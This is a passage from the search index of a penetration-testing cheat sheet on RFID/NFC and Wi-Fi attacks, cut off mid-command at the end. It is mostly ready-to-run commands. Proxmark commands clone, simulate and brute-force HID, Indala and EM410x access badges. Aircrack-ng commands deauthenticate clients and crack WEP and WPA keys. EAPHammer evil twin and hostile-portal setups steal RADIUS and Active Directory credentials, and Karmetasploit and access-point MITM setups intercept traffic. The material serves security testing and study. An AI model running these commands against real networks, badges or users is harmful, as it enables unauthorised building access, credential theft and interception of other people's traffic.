\"C44DBCD92F9DCF42F4902A87335DBB35D2FF530CDB09814CFA1F4B95A1BD018D099BC6AB69F667B4922AE1ED826E72951AA3E0EAAA7D49A695F04F8CDAAE2D18D10D25BD529CBB05ABF070DC7C041EC35C2BA7F58CC4C349983CC6E11A5CBE828FB8ECBC26F08E1094A6B44C8953C8E1BAFD214DF3E69F430A98CCC75C03669D\"\n\"France Telecom\", 0x07AC, \"9d66035cc7cc980a439fe6f34d21fdbae1c853894cb4a694108ef026bcecb88f82be5c1ae1c63c9849c3c48cf5a72b5cc31e047cdc70f0ab05bb9c52bd250dd1182daeda8c4ff095a6497daaeae0a31a95726e82ede12a92b467f669abc69b098d01bda1954b1ffa4c8109db0c53ffd235bb5d33872a90f442cf9d2fd9bc4dc4\"\n\"EDF-GDF\", 0x07AD, \"B35193DBD2F88A21CDCFFF4BF84F7FC036A991A363DCB3E802407A5E5879DC2127EECFC520779E79E911394882482C87D09A88B0711CBC2973B77FFDAE40EA0001F595072708C558B484AB89D02BCBCB971FF1B80371C0BE30CB13661078078BB68EBCCA524B9DD55EBF7D47D9355AFC95511350CC1103A5DEE847868848B235\"\n\"EDF-GDF\", 0x07AD, \"35b248888647e8dea50311cc50135195fc5a35d9477dbf5ed59d4b52cabc8eb68b0778106613cb30bec07103b8f11f97cbcb2bd089ab84b458c508270795f50100ea40aefd7fb77329bc1c71b0889ad0872c4882483911e9799e7720c5cfee2721dc79585e7a4002e8b3dc63a391a936c07f4ff84bffcfcd218af8d2db9351b3\"\n</code></pre>"},{"location":"protocols/rfid-nfc/hf-vigik/#references","title":"References","text":""},{"location":"protocols/rfid-nfc/lf-hid-indala/","title":"LF - HID & Indala","text":""},{"location":"protocols/rfid-nfc/lf-hid-indala/#hid-indala","title":"HID & Indala","text":"<p>Cloning requires writable T55xx card. The T55x7 card can be configured to emulate many of the 125 kHz tags.</p> <pre><code>lf search # HID Prox TAG ID: 2004263f88\nlf hid fskdemod # (Push the button on the PM3 to stop scanning - not necessary)\nlf hid demod # (Push the button on the PM3 to stop scanning - not necessary)\nlf hid clone 2004263f88 # (id \u00e0 cloner)\nlf hid sim 200671012d # simulate HID card with UID=200671012d\n\nlf indala read\nlf indala demod\nlf indala sim a0000000c2c436c1 # simulate Indala with UID=a0000000c2c436c1\nlf indala clone a0000000c2c436c1 # clone Indala to T55x7 card\n\nlf hitag info\nlf hitag sim c378181c_a8f7.ht2 # simulate HiTag\n</code></pre>"},{"location":"protocols/rfid-nfc/lf-hid-indala/#lf-em410x","title":"LF - EM410X","text":"<p>Read only memory :/</p> <pre><code>Proxmark> lf em4x em410xread\nEM410x Tag ID: 23004d4dee\nProxmark> lf em4x em410xsim 23004d4dee\n</code></pre>"},{"location":"protocols/rfid-nfc/lf-hid-indala/#hid-examples-card","title":"HID : Examples - Card","text":""},{"location":"protocols/rfid-nfc/lf-hid-indala/#hid-card-format","title":"HID card format","text":"<pre><code>proxmark3> lf hid decode 10001fc656\n-------------------------------------------------- \n Format: H10302 (HID H10302 37-bit huge ID) \n Card Number: 1041195 \n Parity: Valid \n-------------------------------------------------- \n Format: H10304 (HID H10304 37-bit) \nFacility Code: 1 \n Card Number: 516907 \n Parity: Valid \n-------------------------------------------------- \n</code></pre>"},{"location":"protocols/rfid-nfc/lf-hid-indala/#write-to-an-hid-card","title":"Write to an HID card","text":"<pre><code># version with facility code is better\nproxmark3> lf hid encode H10304 f 49153 c 516907\nHID Prox TAG ID: 1c001fc656 \n\nproxmark3> lf hid encode H10302 c 1041195\nHID Prox TAG ID: 10001fc656 \n-------------------------------------------------\n</code></pre> <p>Example 2</p> <pre><code>proxmark3> lf hid decode 1c0006bb43\n-------------------------------------------------- \n Format: H10302 (HID H10302 37-bit huge ID) \n Card Number: 220577 \n Parity: Valid \n-------------------------------------------------- \n Format: H10304 (HID H10304 37-bit) \nFacility Code: 49152 \n Card Number: 220577 \n Parity: Valid \n-------------------------------------------------- \nproxmark3> lf hid encode H10302 c 220577\nHID Prox TAG ID: 100006bb43 \n</code></pre>"},{"location":"protocols/rfid-nfc/lf-hid-indala/#bruteforce-an-hid-reader","title":"Bruteforce an HID reader","text":"<pre><code>pm3 --> lf hid brute a 26 f 224\npm3 --> lf hid brute v a 26 f 21 c 200 d 2000\n\nOptions\n---\na <format> : 26|33|34|35|37|40|44|84\nf <facility-code> : 8-bit value HID facility code\nc <cardnumber> : (optional) cardnumber to start with, max 65535\nd <delay> : delay betweens attempts in ms. Default 1000ms\nv : verbose logging, show all tries\n</code></pre>"},{"location":"protocols/rfid-nfc/lf-hid-indala/#references","title":"References","text":"<ul> <li>Proxmark 3, le couteau suisse RFID - Bourdin Pierre - octobre 2017</li> <li>Badge Cloning: Clone HID Prox with Proxmark3 RDV4 - Standalone Mode - Tinker - October 22, 2018</li> </ul>"},{"location":"protocols/rfid-nfc/readme/","title":"NFC - RFID","text":"<p>Radio Frequency Identification (RFID) & Near Field Communication (NFC)</p>"},{"location":"protocols/rfid-nfc/readme/#notes-about-card-types","title":"Notes about card types","text":""},{"location":"protocols/rfid-nfc/readme/#high-frequency","title":"High Frequency","text":"<p>Around 13.56 MHz.</p> <ul> <li>MIFARE Classic 1K/4K: basically just a memory storage device. This memory, either 1024 or 4096 bytes, is divided into sectors and blocks. Most of the time used for regular access badges and has really simple security mechanisms for access control</li> <li>MIFARE Ultralight: a 64 bytes version of MIFARE Classic. It\u2019s low costs make it widely used as disposable tickets for events or transportation.</li> <li>MIFARE Plus: announced as a replacement of MIFARE Classic. The Plus subfamily brings the new level of security up to 128-bit AES encryption.</li> <li>MIFARE DESFire: those tags come pre-programmed with a general purpose DESFire operating system which offers a simple directory structure and files, and are the type of MIFARE offering the highest security levels.</li> </ul>"},{"location":"protocols/rfid-nfc/readme/#low-frequency","title":"Low Frequency","text":"<p>Usually around 125 kHz.</p> <ul> <li>HID</li> <li>EM410X</li> <li>Indala</li> </ul>"},{"location":"protocols/rfid-nfc/readme/#replay-attacks","title":"Replay Attacks","text":"<p>Replay attack is a technique where a malicious user could implement a device to intercept a NFC transaction and redeem it later, using other device or even in different location. </p>"},{"location":"protocols/rfid-nfc/readme/#relay-attack","title":"Relay Attack","text":"<p>The relay attack is a technique where a malicious user implements a man in the middle attack. The attacker(APDUer) is capable to intercept, manipulate and change the transaction in real time to take advantage of it. https://en.wikipedia.org/wiki/Relay_attack</p> <ul> <li>NFC Payment Relay Attacks - intro-to-nfc-payment-relay-attacks/</li> <li>NFCopy85 is a 10 dollars device to make replay attacks against NFC payment systems - nfcopy85</li> </ul>"},{"location":"protocols/rfid-nfc/readme/#references","title":"References","text":"<ul> <li>RFID Hacking with The Proxmark 3 - Kevin Chung - May 29, 2017</li> <li>RFID \u2013 Le clone parfait - Alex - 12 juillet 2017</li> <li>Proxmark 3, le couteau suisse RFID - Bourdin Pierre - octobre 2017</li> <li>A 2018 practical guide to hacking NFC/RFID - S\u0142awomir Jasek - 4.06.2018</li> <li>Infosec - NFC Mifare - @SecurityGuill</li> </ul>"},{"location":"protocols/wifi/wifi-basics/","title":"Wifi - Basics","text":""},{"location":"protocols/wifi/wifi-basics/#tools","title":"Tools","text":"<ul> <li>aircrack-ng/aircrack-ng - WiFi security auditing tools suite</li> <li>kimocoder/wifite2 - Rewrite of the popular wireless network auditor, \"wifite\" - original by @derv82</li> <li>derv82/wifite2 - Rewrite of the popular wireless network auditor, \"wifite\" </li> <li>derv82/wifite - Wifite is an automated wireless attack tool.</li> </ul>"},{"location":"protocols/wifi/wifi-basics/#linux-wireless-basics","title":"Linux Wireless Basics","text":"<pre><code>AP_MAC=\"XX:XX:XX:XX:XX\" # BSSID\nVICTIM_MAC=\"XX:XX:XX:XX:XX\" # VIC\nATTACKER_MAC=\"XX:XX:XX:XX:XX\" # MON\nAP_SSID=\"wifibox\" # ESSID\nSRC_ADDR=\"192.168.1.1\"\nDST_ADDR=\"192.168.1.255\"\n</code></pre> <pre><code># driver install\napt install realtek-rtl88xxau-dkms\n\n# network card recon\niwconfig\niw list\ndmesg | grep 8187 # alfa card\n\n# Increase Wi-Fi TX Power\niw reg set B0\niwconfig wlan0 txpower <NmW|NdBm|off|auto> # txpower is 30 (usually)\n\n# find SSID and channel\niw dev wlan0 scan | grep SSID\niw dev wlan0 scan | egrep \"DS\\ Parameter\\ set|SSID\"\niwlist wlan0 scanning | egrep \"ESSID|Channel\"\n\n# monitor mode - start\nairmon-ng start wlan0\nairmon-ng start wlan0 3 # only on a particular channel e.g: 3\n * Manual 1: iw dev wlan0 interface add mon0 type monitor\n * Manual 2: iwconfig wlan0 mode monitor channel 3\nifconfig mon0 up\n# monitor mode - stop\nairmon-ng stop mon0\n * Manual 1: iw dev wlan0 interface del mon0 \n * Manual 2: iwconfig wlan0 mode managed\n</code></pre>"},{"location":"protocols/wifi/wifi-basics/#aircrack-ng-essentials","title":"Aircrack-ng Essentials","text":"<pre><code># check and kill processes that could interfere with our monitor mode\nairmon-ng check\nairmon-ng check kill\n# pkill dhclient; pkill wpa_supplicant; pkill dhclient3\n\n# list AP\nairodump-ng mon0\nairodump-ng mon0 -c 3 # only on a particular channel e.g: 3\nairodump-ng mon0 -c 3 --bssid $AP_MAC -w clearcap # dump traffic\n\n# get our macaddress\nmacchanger -s mon0 \nmacchanger --show mon0\n\n# replay and accelerate traffic\naireplay-ng\n * -i interface\n * -r file.pcap\n\n# check aireplay card compatibility\naireplay-ng -9 mon0 -> test injection\naireplay-ng -9 -i wlan1 mon0 -> test card to card injection\n\n# injection rate\niwconfig wlan0 rate 1M\n\n# Aircrack compatibility\nhttp://www.aircrack-ng.org/doku.php?id=compatibility_drivers#list_of_compatible_adapters\nAlfa AWUS036H / TPLink WN722\n</code></pre>"},{"location":"protocols/wifi/wifi-basics/#fake-authentication-attack","title":"Fake authentication attack","text":"<p> use it before each attack</p> <pre><code>airodump-ng -c 3 --bssid $AP_MAC -w wep1 mon0\n\n# fake authentication = no arp\naireplay-ng -1 0 -e AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0\n * Might need a real $ATTACKER_MAC, observe traffic using airodump\n > Association successful! :-)\n\n# fake authentication for picky AP\n# Send keep-alive packets every 10 seconds\naireplay-ng -1 6000 -o 1 -q 10 -e <ESSID> -a <AP MAC> -h <Your MAC> <interface>\n\n# might need to fake your MAC ADDRESS first\n</code></pre>"},{"location":"protocols/wifi/wifi-basics/#deauthentication-attack","title":"Deauthentication attack","text":"<p>Force ARP packet to be sent.</p> <pre><code>aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0\n * -0 : 1 deauthentication, 0 unlimited\n > Sending 64 directed DeAuth.\n</code></pre>"},{"location":"protocols/wifi/wifi-basics/#arp-replay-attack","title":"ARP Replay Attack","text":"<p>Video: wifu-20.mp4 The attack listens for an ARP packet and then retransmits it back to the access point. This, in turn, causes the AP to repeat the ARP packet with a new IV. By collecting enough of these IVs Aircrack-ng can then be used to crack the WEP key.</p> <pre><code>aireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0\n * ATTACKER_MAC if fake authentication launched\n * CONNECTED_MAC if a client is associated\n\n# \u2013x 1000 \u2013n 1000 ?\n# aireplay-ng -3 \u2013x 1000 \u2013n 1000 \u2013b $AP_MAC -h $ATTACKER_MAC wlan0mon\n# wait for ARP on the network\n# alternatively you can de-auth some clients\n\naircrack-ng \u2013b <BSSID> <PCAP_of_FileName>\naircrack-ng -0 wep1.cap\n * -0 : colored output\n</code></pre>"},{"location":"protocols/wifi/wifi-basics/#references","title":"References","text":"<ul> <li>Wireless Penetration Testing Cheat Sheet [UPDATED \u2013 2022]</li> <li>Aireplay 0841 Attack \u2013 Introduction</li> </ul>"},{"location":"protocols/wifi/wifi-corporate/","title":"Wifi - Enterprise Network","text":""},{"location":"protocols/wifi/wifi-corporate/#wpa-and-wpa2-eap","title":"WPA and WPA2 EAP","text":"<p>WPA EAP refers to the use of the Extensible Authentication Protocol (EAP) within the context of the Wi-Fi Protected Access (WPA) security standard for wireless networks. WPA is a suite of security protocols to secure wireless local area networks (WLANs) and is a response to the vulnerabilities of the older Wired Equivalent Privacy (WEP) standard. WPA EAP is specifically associated with the enterprise mode of WPA, which uses 802.1X authentication to provide a higher level of security compared to the personal mode of WPA, which uses a pre-shared key (PSK).</p> <ul> <li> <p>s0lst1c3/eaphammer - Targeted evil twin attacks against WPA2-Enterprise networks. <pre><code>git clone https://github.com/s0lst1c3/eaphammer.git\n./kali-setup\n\n# generate certificates\n./eaphammer --cert-wizard\n\n# launch attack\n./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds\n\n# deauth users and wait for them to connect to our AP\naireplay-ng -0 0 -a MAC_ADDR_AP -c MAC_ADDR_CIBLE wlan0mon\n</code></pre></p> </li> <li> <p>Stealing RADIUS Credentials Using EAPHammer <pre><code>./eaphammer --bssid 1C:7E:E5:97:79:B1 --essid Example --channel 2 --interface wlan0 --auth wpa-eap --creds\n</code></pre></p> </li> <li> <p>Stealing AD Credentials Using Hostile Portal Attacks <pre><code>./eaphammer --interface wlan0 --bssid 1C:7E:E5:97:79:B1 --essid EvilC0rp --channel 6 --auth wpa-eap --hostile-portal\n./eaphammer --interface wlan0 --essid TotallyLegit --hw-mode n --channel 36 --auth open --hostile-portal\n</code></pre></p> </li> <li> <p>Performing Captive Portal Attacks - Evil Twin Attacks <pre><code>./eaphammer --bssid 1C:7E:E5:97:79:B1 --essid HappyMealz --channel 149 --interface wlan0 --captive-portal\n./eaphammer --captive-portal -e guestnet -i wlan0 --portal-template rogue-cert-prompt --lhost 10.0.0.10 --payload secure.crt\n</code></pre></p> </li> </ul>"},{"location":"protocols/wifi/wifi-corporate/#rogue-access-point","title":"Rogue Access Point","text":""},{"location":"protocols/wifi/wifi-corporate/#wpa-handshake","title":"WPA handshake","text":"<pre><code>airmon-ng start wlan0 3\nairodump-ng -c 3 -d $ATTACKER_MAC -w airbase mon0\n\n# basic fake AP\nairbase-ng -c 3 -e $AP_SSID mon0\nairbase-ng -c 3 -e $AP_SSID -z 4 -W 1 mon0\n-W 1 : WEP\n\n# get a WPA handshake if the client connect\naircrack-ng -w /pentest/passwords/john/password.lst airbase-01.cap\n</code></pre>"},{"location":"protocols/wifi/wifi-corporate/#karmetasploit","title":"Karmetasploit","text":"<pre><code># install a dhcp server\napt install dhcp3-server\n\nairmon-ng start wlan0 3\nairbase-ng -c 3 -P -C 60 -e $AP_MAC -v mon0\n-P: respond to all probes\nifconfig at0 up 10.0.0.1/24\n\nmkdir -p /var/run/dhcpd\nchown -R dhcpd:dhcpd /var/run/dhcpd\ntouch /var/lib/dhcp3/dhcpd.leases\n\n\"CONF DHCP FROM VIDEO 75\" > /tmp/dhcpd.conf\n\ntouch /tmp/dhcp.log\nchown -R dhcpd:dhcpd /tmp/dhcp.log\ndhcpd3 -f -cf /tmp/dhcpd.conf -pf /var/run/dhcpd/pid -lf /tmp/dhcp/log at0\n\nkarma.rc from metasploit\n# comment the first 2 lines (load sqlite)\nmsfconsole -r /root/karma.rc\n</code></pre>"},{"location":"protocols/wifi/wifi-corporate/#access-point-mitm","title":"Access Point MITM","text":"<pre><code>airmon-ng start wlan0 3\nairbase-ng -c 3 -e $AP_SSID_SPOOFED mon0\n\n# create a bridged interface\n# apt-get install bridge-utils\nbrctl addbr hacker\nbrctl addif hacker eth0\nbrctl addif hacker at0\n\n# assign IP addresses\nifconfig eth0 0.0.0.0 up\nifconfig at0 0.0.0.0 up\nifconfig hacker 192.168.1.8 up\n\n# enable IP forwarding\necho 1 > /proc/sys/net/ipv4/ip_forward\n\n# mitm tools\ndriftnet\nettercap -G\nSniff > Unified sniffing > Hacker Interface\n</code></pre>"},{"location":"protocols/wifi/wifi-corporate/#references","title":"References","text":"<ul> <li>Retex : Test d\u2019intrusion Wi-Fi (WPA2-Enterprise) - @virtualsamuraii</li> </ul>"},{"location":"protocols/wifi/wifi-other/","title":"Wifi - Additional Tricks and Tools","text":""},{"location":"protocols/wifi/wifi-other/#additional-aircrack-ng-tools","title":"Additional Aircrack-NG Tools","text":""},{"location":"protocols/wifi/wifi-other/#remove-wireless-headers","title":"Remove Wireless Headers","text":"<pre><code>airdecap-ng -b $AP_MAC open-network.cap\n* -dec.cap: stripped version of the file\n</code></pre>"},{"location":"protocols/wifi/wifi-other/#decrypt-a-wep-encrypted-capture-file","title":"Decrypt a WEP encrypted capture file","text":"<pre><code>airdecap-ng -w $WEP_KEY wep.cap\n</code></pre>"},{"location":"protocols/wifi/wifi-other/#decrypt-a-wpa2-encrypted-capture-file","title":"Decrypt a WPA2 encrypted capture file","text":"<pre><code>airdecap-ng -e $AP_SSID -p $WPA_PASSWORD tkip.cap\n</code></pre>"},{"location":"protocols/wifi/wifi-other/#remote-aircrack-suite","title":"Remote Aircrack Suite","text":"<pre><code>airmon-ng start wlan0 3\nairserv-ng -p 1337 -c 3 -d mon0\nairodump-ng -c 3 --bssid $AP_MAC $HOST:$PORT\n</code></pre>"},{"location":"protocols/wifi/wifi-other/#wireless-intrusion-detection-system","title":"Wireless Intrusion Detection System","text":"<p>Require wireless key and bssid</p> <pre><code>airmon-ng start wlan0 3\n\n# create the at0 interface\nairtun-ng -a $AP_MAC -w $WEP_KEY mon0\n# the interface will auto decrypt packets\n</code></pre>"},{"location":"protocols/wifi/wifi-other/#wireless-reconnaissance","title":"Wireless Reconnaissance","text":"<p>Use CSV file from airodump</p> <p>CAPR Graph</p> <pre><code>airgraph-ng -i wifu-01.csv -g CAPR -o wifu-capr.png\n# color\n- green: wpa\n- yellow: wep\n- red: open\n- black: unknown\n</code></pre> <p>CPG - Client Probe Graph</p> <pre><code>airgraph-ng -i wifu-01.csv -g CPG -o wifu-cpg.png\n</code></pre>"},{"location":"protocols/wifi/wifi-other/#kismet","title":"Kismet","text":"<pre><code>kismet\n[enter][enter]\n[tab][close]\n\n# Select a source and begin a monitoring\nKismet > Add source > wlan0 > Add\n\n.nettxt: data\n.pcapdump: wireshark format\n</code></pre> <pre><code># giskismet: kismet inside a SQL database\n> require a GPS receiver\n\ngpsd -n -N -D4 /dev/ttyUSB0\n-N : foreground \n-D : debugging level\n\n# kismet will gather SSID and GPS location\ngiskismet -x kismet.netxml\n\n# generate a kml file (Google Earth)\ngiskismet -q \"select * from wireless\" -o allaps.kml\ngiskismet -q \"select * from wireless where Encryption='WEP'\" -o wepaps.kml\n</code></pre>"},{"location":"protocols/wifi/wifi-other/#other-things","title":"Other things","text":"<pre><code># Find Hidden SSID\naireplay-ng -0 20 \u2013a <BSSID> -c <VictimMac> mon0\n\n# Mac Filtering\nmacchanger \u2013-mac <VictimMac> wlan0mon\naireplay-ng -3 \u2013b <BSSID> -h <FakedMac> wlan0mon\n# MAC CHANGER\nifconfig wlan0mon down\nmacchanger \u2013-mac <macVictima> wlan0mon\nifconfig wlan0mon up\n\n# Deauth Global\naireplay-ng -0 0 -e hacklab -c FF:FF:FF:FF:FF:FF wlan0mon\n\n# Authentication DoS Mode\nmdk3 wlan0mon a -a $AP_MAC\n\n# Tshark - Filter and dislay data\ntshark -r Captura-02.cap -Y \"eapol\" 2>/dev/null\ntshark -i wlan0mon -Y \"wlan.fc.type_subtype==4\" 2>/dev/null\ntshark -r Captura-02.cap -Y \"(wlan.fc.type_subtype==0x08 || wlan.fc.type_subtype==0x05 || eapol) && wlan.addr==20:34:fb:b1:c5:53\" 2>/dev/null\n\n# Convert .cap with handshake to .hccap\naircrack-ng -J network network.cap\n</code></pre>"},{"location":"protocols/wifi/wifi-wep/","title":"Wifi - WEP Cracking","text":""},{"location":"protocols/wifi/wifi-wep/#cracking-wep-with-a-client","title":"Cracking WEP with a Client","text":""},{"location":"protocols/wifi/wifi-wep/#arp-request-replay-attack","title":"ARP Request Replay Attack","text":"<p>Attack the ACCESS POINT</p> <pre><code>airmon-ng start wlan0 3 # only a particular channel : 3\nairodump-ng mon0 -c 3 --bssid $AP_MAC -w arpreplay # dump traffic\n\n# Fake authentication for a more reliable attack\naireplay-ng -1 0 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0\n\n# ARP replay attack\naireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0\n\n# Deauthentication\naireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0\n\n# Cracking\naircrack-ng arpreplay.cap\n</code></pre>"},{"location":"protocols/wifi/wifi-wep/#interactive-replay-attack","title":"Interactive replay attack","text":"<p>Attack a client to force new packets 0841 attack, or interactive packet replay is a WEP attack that allows for packet injection when ARP replay is not available/working.</p> <pre><code>airmon-ng start wlan0 3 # only a particular channel : 3\nairodump-ng -c 3 --bssid $AP_MAC -w clearcap mon0 # dump traffic\n\n# fake authentication for a more reliable attack\naireplay-ng -1 0 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0\n\n# interactive replay attack (min arp 68, max arp 86)\naireplay-ng -2 -b $AP_MAC -d FF:FF:FF:FF:FF -f 1 -m 68 -n 86 mon0 # interactive - natural selection of a packet\naireplay-ng -2 -b $AP_MAC -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 mon0 # interactive - force create a packet\n# Packet selection (ARP packets met the characteristics): \n# - APs will always repeat packets destined to the broadcast\n# - The packet will have the ToDS (To Distribution System) bit set to 1\n# answer \"y\" multiple times\n\n# cracking require ~> 250000 IVs\naircrack-ng -0 -z -n 64 clientwep-01.cap\n * -z: PTW attack\n * -n: number of bits in the WEP key\n\n# backup file with an ARP packet\naireplay-ng -2 -r replay.cap mon0\n</code></pre>"},{"location":"protocols/wifi/wifi-wep/#cracking-wep-without-a-client","title":"Cracking WEP without a Client","text":"<ul> <li>Chopchop & Fragmentation attack => PRGA, generate more packets with weak IVs</li> <li>Need an AP configured with open system authentication</li> </ul> <p>Prerequisite:</p> <pre><code># put into monitor mode on our desired channel\nairmon-ng start wlan0 3 # only a particular channel : 3\nairodump-ng -c 3 --bssid $AP_MAC -w wepcrack mon0 # see no client\n\n# fake authentication attack with association timing (every 60s try to reassociate)\naireplay-ng -1 60 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0 # should see a client in airodump\n# -1 6000 to avoid a time out.\n</code></pre>"},{"location":"protocols/wifi/wifi-wep/#fragmentation-attack","title":"Fragmentation attack","text":"<p>Goal: 1500 bytes of PRGA Atheros does not generate the correct packets unless the wireless card is set to the MAC address you are spoofing.</p> <pre><code># attacker mac must be associated (fake auth)\n# Press \"Y\"\naireplay-ng -5 -b $AP_MAC -h $ATTACKER_MAC mon0\n\n# use our PRGA from the fragmentation attack to generate an ARP request\n# SRC_ADDR: 192.168.1.100 \n# DST_ADDR: 192.168.1.255, should not exist (broadcast address)\npacketforge-ng -0 -a $AP_MAC -h $ATTACKER_MAC -l $SRC_ADDR -k $DST_ADDR -y frag.xor -w inject.cap\n# -k: the destination IP i.e. in ARP, this is \"Who has this IP\"\n# -l: the source IP i.e. in ARP, this is \"Tell this IP\"\n\n# check the packet\ntcpdump -n -vvv -e -s0 -r inject.cap\n\n# inject our crafted packet\naireplay-ng -2 -r inject.cap mon0\n\n# crack the WEP key\n# Aircrack-ng will auto-update when new IVs are available\naircrack-ng -0 wepcrack\n\n# if 64-bit WEP is used, cracking time < 5 minutes \n# switch to 128-bit keys after 600000 IVs\n# use the `-f 4` after 2000000\naircrack-ng -n 64 <capture filename>\n</code></pre>"},{"location":"protocols/wifi/wifi-wep/#korek-chopchop-attack","title":"KoreK Chopchop attack","text":"<p>Can't be used for every AP, might work when fragmentation fails Much slower than the fragmentation attack</p> <pre><code># chopchop attack: -4\n# out decrypted: .cap\n# out prga: .xor\n# Press \"Y\" (choose a small packet)\naireplay-ng -4 -b $AP_MAC -h $ATTACKER_MAC mon0\n\n# check the packet and find the network addresses\ntcpdump -n -vvv -e -s0 -r inject.cap\n\n# use our PRGA from the fragmentation attack\n# SRC_ADDR: 192.168.1.100 \n# DST_ADDR: 192.168.1.255, should not exist (broadcast address)\npacketforge-ng -0 -a $AP_MAC -h $ATTACKER_MAC -l $SRC_ADDR -k $DST_ADDR -y prga.xor -w chochop_out.cap\n\n# inject our crafted packet\naireplay-ng -2 -r chochop_out.cap mon0\n\n# crack the WEP key\naircrack-ng -0 wepcrack\n</code></pre>"},{"location":"protocols/wifi/wifi-wep/#bypassing-wep-shared-key-authentication-ska","title":"Bypassing WEP Shared Key Authentication SKA","text":"<p>By default, most wireless drivers will attempt open authentication first. If open authentication fails, they will proceed to try shared authentication.</p> <p>Prerequisite:</p> <ul> <li>Authentication: Shared Key</li> <li>When Fake Authentication => <code>AP rejects open-system authentication</code></li> </ul> <pre><code># put into monitor mode on our desired channel\nairmon-ng start wlan0 3 # only a particular channel : 3\nairodump-ng -c 3 --bssid $AP_MAC -w sharedkey mon0\n\n# deauthentication attack on the connected client\n# airodump should display SKA under the AUTH column\n# PRGA file will be saved as xxxx.xor\naireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0\n# TO CHECK aireplay-ng -0 10 \u2013a $AP_MAC -c $VICTIM_MAC mon0\n\n# fake authentication attack with association timing (every 60s try to reassociate)\n# should display switching to Shared Key Authentication\n# If you are using a PRGA file obtained from a chopchop attack, make sure that it is at least 144 bytes long\n# If you have \"Part2: Association Not answering...(Step3)\" -> spoof the mac address used to fake auth\naireplay-ng -1 60 -e $AP_SSID -y sharedkey.xor -b $AP_MAC -h $ATTACKER_MAC mon0\n\n# ARP replay attack\naireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0\n\n# deauthentication attack on the connected client\n# speed the ARP attack process using deauth\naireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0\n# TO CHECK: aireplay-ng \u2013-deauth 1 \u2013a $AP_MAC -h <FakedMac> wlan0mon\n\n# crack the WEP key\naircrack-ng sharedkey.cap\n</code></pre>"},{"location":"protocols/wifi/wifi-wep/#references","title":"References","text":"<ul> <li>TODO</li> </ul>"},{"location":"protocols/wifi/wifi-wpa/","title":"Wifi - WPA Cracking","text":""},{"location":"protocols/wifi/wifi-wpa/#tools","title":"Tools","text":"<ul> <li>aircrack-ng/aircrack-ng - WiFi security auditing tools suite</li> <li>bettercap/bettercap</li> </ul>"},{"location":"protocols/wifi/wifi-wpa/#wpa-psk-attack","title":"WPA PSK Attack","text":""},{"location":"protocols/wifi/wifi-wpa/#cracking-wpa-with-john-the-ripper","title":"Cracking WPA with John the Ripper","text":"<pre><code># put into monitor mode on our desired channel\nairmon-ng start wlan0 3 # only a particular channel : 3\nairodump-ng -c 3 --bssid $AP_MAC -w wpajohn mon0 # see no client\n\n# deauthentication to get the WPA handshake (Sniffing should show the 4-way handshake)\naireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0\n\n# crack without john the ripper (-b <BSSID>)\naircrack-ng -0 -w /pentest/passwords/john/password.lst wpajohn-01.cap\naircrack-ng -0 -w /pentest/passwords/john/password.lst wpajohn-01.cap \naircrack-ng -w password.lst,secondlist.txt wpajohn-01.cap # multiple dicts\n\n# crack with john the ripper - combine mangling rules with aircrack\n# rules example to add in /pentest/passwords/john/john.conf\n# $[0-9]$[0-9]\n# $[0-9]$[0-9]$[0-9]\njohn --wordlist=/pentest/wireless/aircrack-ng/test/password.lst --rules --stdout | aircrack-ng -0 -e $AP_SSID -w - /root/wpajohn\n\n# generate PMKs for a faster cracking - Precomputed WPA Keys Database Attack\necho wifu > essid.txt\nairolib-ng test.db --import essid essid.txt\nairolib-ng test.db --stats\nairolib-ng test.db --import passwd /pentest/passwords/john/password.lst\nairolib-ng test.db --batch\nairolib-ng test.db --stats\naircrack-ng -r test.db wpajohn-01.cap\n# airolib-ng test.db --clean all\n\n# Not in lab - Convert to hccap to use with John Jumbo\naircrack-ng <FileName>.cap -J <outFile>\nhccap2john <outFile>.hccap > <JohnOutFile>\njohn <JohnOutFile>\n</code></pre>"},{"location":"protocols/wifi/wifi-wpa/#cracking-wpa-with-cowpatty","title":"Cracking WPA with coWPAtty","text":"<p>Better for PMK Rainbow table attacks</p> <pre><code># put into monitor mode on our desired channel\nairmon-ng start wlan0 3 # only a particular channel : 3\nairodump-ng -c 3 --bssid $AP_MAC -w wpacow mon0 # see no client\n\n# deauthentication to get the WPA handshake\naireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0\n\n# coWPAtty dictionary mode (slow)\ncowpatty -r wpacow-01.cap -f /pentest/passwords/john/password.lst -2 -s $AP_SSID\n\n# coWPAtty rainbow table mode (fast)\ngenpmk -f /pentest/passwords/john/password.lst -d wifuhashes -s $AP_SSID\ncowpatty -r wpacow-01.cap -d wifuhashes -2 -s $AP_SSID\n</code></pre>"},{"location":"protocols/wifi/wifi-wpa/#cracking-wpa-with-pyrit","title":"Cracking WPA with Pyrit","text":"<p>Can use GPU</p> <pre><code># put into monitor mode on our desired channel\nairmon-ng start wlan0 3 # only a particular channel : 3\nairodump-ng -c 3 --bssid $AP_MAC -w wpapyrit mon0 # see no client\n\n# deauthentication to get the WPA handshake\naireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0\n\n# clean the cap and extract only good packets\npyrit -r wpapyrit-01.cap analyze\npyrit -r wpapyrit-01.cap -o wpastripped.cap strip\n\n# dictionary attack - slow ++\npyrit -r wpapyrit-01.cap -i /pentest/passwords/john/password.lst -b $AP_MAC attack_passthrough\n\n# pre-computed hashes attack - slow on CPU\npyrit eval # pwds in database\npyrit -i /pentest/passwords/john/password.lst import_passwords # import in the database\npyrit -e $AP_SSID create_essid\npyrit batch # generate\npyrit -r wpastripped.cap attack_db \n\n# gpu power attack - fast on GPU\npyrit list_cores\npyrit -i /pentest/passwords/john/password.lst import_passwords # import in the database\npyrit -e $AP_SSID create_essid\npyrit batch\npyrit -r wpastripped.cap 